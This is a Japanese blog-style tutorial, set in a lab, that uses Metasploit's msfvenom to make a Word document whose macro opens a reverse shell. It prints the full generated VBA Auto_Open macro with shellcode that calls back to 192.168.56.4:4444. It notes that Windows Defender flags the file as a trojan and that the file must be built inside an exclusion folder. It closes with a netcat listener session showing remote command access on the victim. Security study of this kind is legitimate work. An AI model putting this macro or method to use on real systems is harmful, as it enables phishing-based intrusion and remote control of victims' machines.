Metasploitを使ってconnect-back shellを起動するWord文書を作ってみる

「電卓を起動するWord文書を作ってみる」では、簡単なVBAマクロを使って電卓を起動するWord文書を作成した。 VBAマクロではWin32 APIを呼ぶことができるため、任意のシェルコードを実行するマクロを書くことができる。 ここでは、Metasploit Frameworkを使ってconnect-back shellを起動するWord文書を作ってみる。

環境

Kali Linux 2.0、Metasploit Framework 4.11.4

root@vm-kali64:~# uname -a
Linux vm-kali64 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux

root@vm-kali64:~# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux 2.0
Release:        2.0
Codename:       sana

root@vm-kali64:~# msfconsole -v
Framework Version: 4.11.4-2015071403

MetasploitでVBAマクロを生成してみる

Metasploitではシェルコードの出力形式としてVBAを選ぶことができ、これはそのままOfficeマクロとして使えるものになっている。

まず、msfvenomコマンドを使ってペイロード名や指定可能なオプションを調べてみる。

root@vm-kali64:~# msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

root@vm-kali64:~# msfvenom -l

Framework Payloads (432 total)
==============================

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    ...
    windows/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
    ...

root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp --payload-options
Options for payload/windows/shell_reverse_tcp:


       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 324
       Rank: Normal

Provided by:
    vlad902 <vlad902@gmail.com>
    sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell


Advanced options for payload/windows/shell_reverse_tcp:
(snip)

上で調べた結果をもとに、192.168.56.4の4444番ポートにconnect-backするVBAマクロを生成すると次のようになる。

root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.4 LPORT=4444 EXITFUNC=thread -f vba
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
#If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As LongPtr, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As LongPtr, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As Long, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As Long, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Ewtoup As Long, Qkhfci As Variant, Kdhhfhp As Long
#If Vba7 Then
        Dim  Hhluw As LongPtr, Lgcpy As LongPtr
#Else
        Dim  Hhluw As Long, Lgcpy As Long
#EndIf
        Qkhfci = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,56,4,104,2,0,17,92,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,104,99,109,100,0,137,227,87,87,87,49,246,106, _
18,89,86,226,253,102,199,68,36,60,1,1,141,68,36,16,198,0,68,84, _
80,86,86,86,70,86,78,86,86,83,86,104,121,204,63,134,255,213,137,224, _
78,86,70,255,48,104,8,135,29,96,255,213,187,224,29,42,10,104,166,149, _
189,157,255,213,60,6,124,10,128,251,224,117,5,187,71,19,114,111,106,0, _
83,255,213)

        Hhluw = VirtualAlloc(0, UBound(Qkhfci), &H1000, &H40)
        For Kdhhfhp = LBound(Qkhfci) To UBound(Qkhfci)
                Ewtoup = Qkhfci(Kdhhfhp)
                Lgcpy = RtlMoveMemory(Hhluw + Kdhhfhp, Ewtoup, 1)
        Next Kdhhfhp
        Lgcpy = CreateThread(0, 0, Hhluw, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub

上の結果のうち、#If Vba7 Then以降が出力されたマクロとなる。 このマクロは、文書が開かれたタイミングで動作する。 具体的には、VirtualAlloc関数とRtlMoveMemory関数でメモリ上にシェルコードを配置し、CreateThread関数でこれを新たなスレッドで実行する。 ここで、デフォルトのEXITFUNC=processではシェルコードの最後にWordのプロセス自体を終了してしまうため、生成時にEXITFUNC=threadを指定していることに注意する。

マクロが埋め込まれたWord文書を作ってみる

「電卓を起動するWord文書を作ってみる」と同様にして、上のマクロを含むWord文書を作成する。 なお、このファイルはWindows DefenderでTrojanDownloader:O97M/Donoff.gen!Aとして検知されるため、Windows Defenderの除外フォルダの中に作成する必要がある。

ncコマンドを使い192.168.56.4の4444番ポートで待ち受けた状態で、Word文書を開きマクロを有効にすると次のようになる。

root@vm-kali64:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.56.1: inverse host lookup failed: Unknown host
connect to [192.168.56.4] from (UNKNOWN) [192.168.56.1] 58116
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>whoami
whoami
target-win8\user

C:\Users\user\Desktop>^C

上の結果より、リモートからWord文書を開いた端末のコマンドプロンプトが操作できていることが確認できる。

関連リンク